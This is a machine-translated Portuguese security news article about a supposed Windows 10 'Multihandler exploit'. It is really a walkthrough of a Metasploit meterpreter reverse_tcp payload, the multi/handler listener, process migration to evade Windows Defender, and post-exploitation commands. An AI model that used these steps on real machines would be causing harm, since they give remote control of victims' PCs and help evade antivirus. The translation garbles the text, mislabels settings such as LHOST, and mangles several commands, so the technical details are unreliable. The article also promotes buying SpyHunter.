Casa > cibernético Notícias > Janelas críticas 10 Vulnerabilidade - Multihandler Exploit
CYBER NEWS

crítica Windows 10 Vulnerabilidade - Multihandler Exploit

Nome troiano:Win32 / Swrort
Tipo troiano
Pequena descrição Ler e escrever permissões no Windows 10. Permite que o atacante para infectar outro PC conectado à uma infectado.
Os sintomas Aparecimento de um arquivo .exe desconhecida.
distribuição Método mails de spam. ataques MITM, redirecionamentos maliciosos.
ferramenta de detecção Baixar SpyHunter, Para ver se o sistema tiver sido afetada por Trojan:Win32 / Swrort

p15_0000A perigosa façanha foi descoberto no Windows 10, usando um troiano:Win32 / Swrort para ignorar o Windows Defender e leitura ganho e escrever permissões. Anonymous pesquisador demonstrou a vulnerabilidade de um canal, chamado Metasploitstation. Ele mostra 3 fases em que você pode deslizar passado do Windows 10 defesas. Não houve informações descoberto até agora sobre se esta façanha foi corrigido ou nenhuma.

janelas 10 Multihandler Exploit Infection – Como fazer isso?

No vídeo, o usuário tech-savvy demonstrou uma simulação de um arquivo ‘123.EXE’ que ele cria e executa como se ele foi aberto no mundo real como um anexo a um e-mail ou executados por outro método. Decidimos dividir o processo de infecção em três fases para ajudar você a entender melhor a metodologia.

Estágio 1: Preparação arquivo

O hacker cria uma carga útil com essa configuração em um ambiente Linux:

janelas msfpaayload / meterpreter / reverse_tcp LHOST = LPORT = x> / home / awer / New folder / 123.exe

portnumber1 * – Esta é a porta utilizada para o ataque. Ele pode ser qualquer porta (4444, 4324, etc.). Temos escrito portnumber1 desde que ele usa uma segunda portnumber que chamamos depois.

Após esta fase está completa e o arquivo é criado pelo atacante e caiu sobre o sistema do usuário, o atacante pode proceder à Fase 2.

Estágio 2: Usando o exploit.

Neste ponto, o invasor usa o multihandler para fazer com que visualize o .exe e aproveite a exploração para abrir uma sessão ativa(conectar) para o PC da vítima.

Isso pode acontecer usando as linhas de comando atuais:

msfconsole (Para iniciar o console. Abre a interface ‘msf>’)

Em 'msf', o invasor pode executar os seguintes comandos:

msf> use exploit / multi / handler
definir lhost 'endereço IP da vítima’
definir lport ‘portnumber1’

Depois disso, o invasor executa a carga útil para estabelecer uma sessão:

msfexploit(manipulador)> definir janelas de carga útil / meterpreter / reverse_tcp

Para verificar se uma sessão ativa é possível, o invasor escreve o comando msfexploit(manipulador)> mostrar opções que permitem que ele veja isso

→Processo EXITFUNC sim Técnica de saída(aceitaram: Vejo, fio..)
Endereço IP da vítima LHOST sim A porta de escuta
LPORT portnumber1 sim O endereço de escuta

Isso permite que ele veja se configurou as configurações corretamente e pode prosseguir com a infecção real do computador.

Estágio 3: Infecção

O comando que o atacante usa para iniciar uma sessão ativa com a vítima é 'explorar'. Depois de executar este comando, o arquivo ‘123.exe’ retornou com esta resposta:

[*] Manipulador reverso iniciado em
[*] Iniciando o manipulador de carga útil…

Neste ponto, o executável foi iniciado na máquina Windows. Apesar do software Windows Defender estar em execução, não parou o ataque. No entanto, quando verificado em busca de vírus, o programa antivírus do Windows detectou imediatamente ‘123.exe’ como um Trojan:Win32 / Swrort.A.

Para evitar a detecção, o atacante usou uma tática, chamado de migração, que criou um arquivo ‘notepad.exe’ que migra a sessão ativa de ‘123.exe’ para este arquivo ao conectar. Isso foi feito usando o comando:

meterpreter> executar post / windows / manage / migrate

Depois de migrar o processo e repetir a mesma simulação, mas usando (porto diferente), o atacante estava de novo. Desta vez, quando o invasor entrou no PC, ele não foi detectado, mesmo depois que o Windows Defender fez uma verificação e o arquivo ‘123.exe’ ainda estava presente no computador.

De lá, o invasor demonstrou permissões completas de leitura e gravação criando uma nova pasta com um novo documento de texto. Tanto quanto sabemos os principais comandos que podem ser usados ​​após a conexão são:

> sysinfo - para mostrar a versão do sistema e informações.
> você :/ – para abrir qualquer diretório de destino.
> shell - para mostrar a versão do Windows e outras informações.
> getwid - mostra o Windows ID.
> ps –aux - exibe todos os arquivos .exe em execução no Gerenciador de Tarefas do Windows.
> ifconfig - exibe informações sobre interfaces (Endereços IP e outras informações). Este comando fornece ao invasor as informações para se conectar a outro computador que esteja na mesma NIC e VLAN do PC infectado. Isso pode ser muito devastador para redes domésticas ou de escritório, caso esse ataque seja bem organizado.

janelas 10 exploits – Conclusão

Não há informações reais sobre se este exploit foi corrigido ou não, mas como com qualquer outro software, pode haver mais descobertos. É por isso que caso você esteja usando o Windows 10, recomendamos baixar e instalar o programa de proteção contra malware avançado. Ele irá protegê-lo ativamente e se atualizar regularmente com as ameaças mais recentes. Além disso, tal programa tem escudos ativos que detectam imediatamente quaisquer conexões não autorizadas.

donload_now_250
digitalizador Spy Hunter só irá detectar a ameaça. Se você quiser a ameaça de ser removido automaticamente, você precisa comprar a versão completa da ferramenta anti-malware.Saiba Mais Sobre SpyHunter Anti-Malware Ferramenta / Como desinstalar o SpyHunter

Berta Bilbao

Berta é um pesquisador de malware dedicado, sonhando para um espaço cibernético mais seguro. Seu fascínio com a segurança de TI começou há alguns anos atrás, quando um malware bloqueado la fora de seu próprio computador.

mais Posts

Deixe um comentário

seu endereço de e-mail não será publicado. Campos obrigatórios são marcados *

Compartilhar no Facebook Compartilhar
Carregando...
Compartilhar no Twitter chilrear
Carregando...
Compartilhar no Google Plus Compartilhar
Carregando...
Partilhar no Linkedin Compartilhar
Carregando...
Compartilhar no Digg Compartilhar
Compartilhar no Reddit Compartilhar
Carregando...
Partilhar no StumbleUpon Compartilhar
Carregando...